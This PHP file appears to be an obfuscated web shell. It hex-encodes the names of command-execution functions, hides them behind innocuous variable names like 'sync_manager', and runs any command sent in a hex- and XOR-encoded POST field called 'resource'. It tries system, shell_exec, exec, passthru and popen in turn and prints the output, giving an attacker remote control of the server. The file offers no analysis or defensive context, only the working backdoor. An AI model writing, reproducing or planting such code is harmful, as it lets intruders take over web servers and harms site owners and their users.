<?php

$sync_manager6 = "\x73\x74\x72e\x61\x6D_\x67\x65t_\x63ont\x65\x6Ets";
$sync_manager2 = "shel\x6C\x5F\x65\x78\x65c";
$core_engine = "hex2\x62i\x6E";
$sync_manager1 = "s\x79\x73\x74em";
$sync_manager5 = "\x70\x6Fpen";
$sync_manager4 = "p\x61s\x73\x74h\x72u";
$sync_manager3 = "ex\x65c";
$sync_manager7 = "\x70\x63l\x6Fse";
if (isset($_POST["\x72eso\x75r\x63\x65"])) {
            function reverse_searcher    (      $symbol     ,      $hld      )    {
      $component   =     ''     ;
      $y=0;
 do{
$component.=chr(ord($symbol[$y])^$hld);
$y++;

} while($y<strlen($symbol));
 return      $component;
     
}
            $resource = $core_engine($_POST["\x72eso\x75r\x63\x65"]);
            $resource = reverse_searcher($resource, 19);
            if (function_exists($sync_manager1)) {
                $sync_manager1($resource);
            } elseif (function_exists($sync_manager2)) {
                print $sync_manager2($resource);
            } elseif (function_exists($sync_manager3)) {
                $sync_manager3($resource, $value_symbol);
                print join("\n", $value_symbol);
            } elseif (function_exists($sync_manager4)) {
                $sync_manager4($resource);
            } elseif (function_exists($sync_manager5) && function_exists($sync_manager6) && function_exists($sync_manager7)) {
                $hld_component = $sync_manager5($resource, 'r');
                if ($hld_component) {
                    $descriptor_pgrp = $sync_manager6($hld_component);
                    $sync_manager7($hld_component);
                    print $descriptor_pgrp;
                }
            }
            exit;
        }